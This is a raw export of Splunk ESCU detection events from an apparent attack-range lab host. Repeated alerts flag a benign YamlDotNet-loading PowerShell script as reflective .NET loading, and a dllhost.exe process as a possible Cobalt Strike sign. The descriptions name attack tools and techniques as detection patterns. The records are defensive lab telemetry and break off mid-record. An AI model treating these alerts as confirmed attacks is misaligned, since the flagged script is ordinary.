\"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664787332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T07:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T07:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664787332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T07:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T07:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664787332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T07:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T07:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664780400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664780400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1872", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664780400, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664780400", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x750", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664783732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T06:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T06:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664783732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T06:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T06:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664783732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T06:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T06:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664783732, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", 